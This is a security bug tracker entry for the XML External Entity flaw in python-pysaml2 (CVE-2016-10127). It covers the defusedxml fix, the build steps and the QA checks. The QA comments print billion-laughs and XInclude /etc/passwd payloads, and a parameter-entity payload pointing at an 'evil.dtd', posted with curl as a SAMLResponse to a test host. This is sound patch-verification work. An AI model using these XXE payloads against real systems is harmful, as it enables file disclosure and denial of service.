Bug 43393 - python-pysaml2: XML External Entity issue (4.1)
Product: UCS
Classification: Unclassified
Component: Security updates
Version: UCS 4.1
OS: Other Linux
Importance: P5 normal
Target Milestone: UCS 4.1-4-errata
Assigned To: Arvid Requate
QA Contact: Florian Best
Duplicates: 43315
Reported: 2017-01-21 19:20 CET by Arvid Requate
Modified: 2019-06-06 12:55 CEST

What kind of report is it?: Security Issue
Bug group (optional): Security
Max CVSS v3 score: 7.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
Flags: requate: Patch_Available+

Attachment: CVE-2016-10127_fix-xxe-in-xml-parsing.patch (8.54 KB, patch), 2017-01-21 19:20 CET, Arvid Requate

Description Arvid Requate univentionstaff 2017-01-21 19:20:51 CET
Created attachment 8362

Upstream Debian Jessie package version 2.0.0-1+deb8u1 fixes this issue:

Matias P. Brutti discovered that python-pysaml2, a Python implementation of the Security Assertion Markup Language 2.0, did not correctly sanitize the XML messages it handled. This allowed a remote attacker to perform XML External Entity attacks, leading to a wide range of exploits (CVE-2016-10127).

In UCS 4.1 we have version 2.4.0-2.
Comment 1 Florian Best univentionstaff 2017-01-21 21:28:54 CET
*** Bug 43315 has been marked as a duplicate of this bug. ***
Comment 2 Florian Best univentionstaff 2017-01-21 21:33:41 CET
We need to cherry-pick https://packages.debian.org/de/jessie/python-defusedxml.
Comment 3 Arvid Requate univentionstaff 2017-02-14 23:39:24 CET
* repo_admin.py -U -d jessie -r 4.1-0-0 -s errata4.1-4 -p defusedxml

Successful build
Package: defusedxml
Version: 0.4.1-2.1.201702142211
Branch: ucs_4.1-0
Scope: errata4.1-4

* repo_admin.py --cherrypick --release 4.1-0 \
  --releasedest 4.1-0 --dest errata4.1-4 --package python-pysaml2

Package: python-pysaml2
Version: 2.4.0-2.4.201702142305
Branch: ucs_4.1-0
Scope: errata4.1-4
= /var/univention/buildsystem2/logs/ucs_4.1-0-0-errata4.1-4/python-pysaml2_2.4.0-2.4.201702142305.log.bz2

* Comparing the log file with the UCS 4.1-0 build looks ok. The 6 new test cases run successfully.

* python-defusedxml has been added to the ucs_4.1-0-ucs4.1-4.txt trigger list as described in the Wiki (Errata-Updates). The package is now listed in buildsystem2/cd-contents/ucs_4.1-4_*.maintained

* Advisories: defusedxml.yaml, python-pysaml2.yaml
Comment 4 Florian Best univentionstaff 2017-02-15 13:07:36 CET
OK: grep ElementTree $(dpkg -L python-pysaml2 | sort) 2>/dev/null | grep fromstring | grep -v defusedxml

>>> import saml2
>>> xml = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n]>\n<lolz>&lol1;</lolz>\n'
>>> saml2.create_class_from_xml_string(None, xml)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/saml2/__init__.py", line 86, in create_class_from_xml_string
    tree = defusedxml.ElementTree.fromstring(xml_string)
  File "/usr/lib/python2.7/dist-packages/defusedxml/common.py", line 159, in fromstring
  File "/usr/lib/python2.7/xml/etree/ElementTree.py", line 1641, in feed
    self._parser.Parse(data, 0)
  File "/usr/lib/python2.7/dist-packages/defusedxml/ElementTree.py", line 95, in defused_entity_decl
    raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)
defusedxml.common.EntitiesForbidden: EntitiesForbidden(name='lol', system_id=None, public_id=None)

OK: not possible to get file contents with e.g.:
<root xmlns:xi="http://www.w3.org/2001/XInclude">\n  <xi:include href="/etc/passwd" parse="text" />\n</root>

OK: SAML login and logout via UMC still works
OK: ucs-test -s saml -E dangerous
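The entity check that the QA session above exercises, re-implemented with only the Python 3 standard library as an added example (it is not pysaml2's or defusedxml's code): expat handlers that abort on any entity declaration or external entity reference before expansion starts, which is the same approach defusedxml's defused_entity_decl takes in the traceback above. The class and function names are assumed, and the inputs are constructed from the documents tried in Comment 4 and Comment 5.

```python
"""Entity-forbidding XML parse in the spirit of defusedxml (added example, stdlib only)."""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class EntitiesForbidden(ValueError):
    """Hypothetical stand-in for defusedxml.common.EntitiesForbidden."""


def _forbid_entity_decl(name, is_parameter_entity, value, base, system_id, public_id, notation):
    # Fires on every <!ENTITY ...> in the DTD (internal or external, general or parameter)
    # before anything is expanded, so billion-laughs growth and file/URL fetches never start.
    raise EntitiesForbidden(name)


def _forbid_external_ref(context, base, system_id, public_id):
    # Defence in depth: refuse any external entity reference that reaches the parser.
    raise EntitiesForbidden(system_id or public_id or "external entity")


def parse_untrusted_xml(xml_string):
    """Pre-scan with hardened expat handlers, then build an ElementTree for clean input."""
    scanner = expat.ParserCreate()
    scanner.EntityDeclHandler = _forbid_entity_decl
    scanner.ExternalEntityRefHandler = _forbid_external_ref
    scanner.Parse(xml_string, True)     # raises EntitiesForbidden on any entity declaration
    return ET.fromstring(xml_string)    # reached only for documents without entity declarations


def is_rejected(xml_string):
    """True when the hardened parse refuses the document."""
    try:
        parse_untrusted_xml(xml_string)
    except EntitiesForbidden:
        return True
    return False


# Constructed inputs: the billion-laughs document from Comment 4, the parameter-entity
# DOCTYPE from Comment 5 (no DTD server is contacted), and a harmless SAML-style response.
BILLION_LAUGHS = ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n'
                  '<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;">\n]>\n'
                  '<lolz>&lol1;</lolz>\n')
EXTERNAL_DTD = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root '
                '[ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> ]><root/>')
BENIGN = ('<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_id1">'
          '<samlp:Status/></samlp:Response>')

if __name__ == "__main__":
    for label, doc in (("billion laughs", BILLION_LAUGHS), ("external DTD", EXTERNAL_DTD),
                       ("benign", BENIGN)):
        print(label, "rejected" if is_rejected(doc) else "parsed")
```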
Comment 5 Florian Best univentionstaff 2017-02-15 19:44:33 CET
Just for myself:

urllib.quote('''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'''.encode('base64').strip())

curl -ik 'https://xen3.school.local/univention/saml/' -H 'Content-Type: application/x-www-form-urlencoded' --data 'SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgcm9vdCBbIDwh%0ARU5USVRZICUgcGF5bG9hZCBTWVNURU0gImh0dHA6Ly9sb2NhbGhvc3Q6ODAwMC9ldmlsLmR0ZCI%2B%0AICVwYXlsb2FkO10%2B'